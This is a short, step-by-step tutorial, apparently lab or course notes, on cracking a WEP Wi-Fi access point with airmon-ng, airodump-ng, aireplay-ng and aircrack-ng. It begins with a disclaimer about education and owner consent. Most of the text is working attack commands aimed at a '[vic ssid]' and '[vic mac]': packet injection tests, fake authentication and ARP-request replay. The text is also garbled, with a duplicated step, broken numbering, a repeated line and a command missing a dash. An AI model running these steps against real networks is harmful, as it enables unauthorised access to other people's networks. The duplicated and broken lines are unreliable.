NOTE: The instructions below are for concept learning and education purposes only. It
is illegal to hack an access point without the owner’s consent.
PHASE 1 –
Monitor Mode
OPEN
A TERMINAL WINDOW
(Terminal 1)
1.
To set your wireless interface to monitor mode.
airmon-ng start [interface]
2.
Start monitoring the wireless traffic, and save it to a file.
airodump-ng [interface] -w [filename] [interface]
PHASE 2 – Generate
IVs
OPEN A SECOND TERMINAL
WINDOW (Terminal 2)
1.
Generate IVs (Initialization Vectors) by using “aireplay-ng”.
2. Type: aireplay-ng --help to see the syntax and switches.
2. Type: aireplay-ng --help to see the syntax and switches.
2.
Test the target’s ability for accept
packet injection, type:
aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
-The ideal outcome is
for a 100% injection result.
3.
List the aireplay-ng help
to view the attack modes available. Be patient
and creative. Here are some examples below:
Fake Authentication
with target AP
Ex.1 - aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
Ex.2 - aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
Standard
ARP-request replay
aireplay-ng -3 -b [vic
mac] -h [your mac] [interface]
PHASE 3
- Cracking
OPEN A THIRD TERMINAL WINDOW (Terminal 3)
1.
Start cracking, type: aircrack-ng
[filename] – Filename is the location and name of the file you are dumping
from Terminal 1.
2.
Pick the target SSID to start cracking.
OR use WIFITE
OR use WIFITE
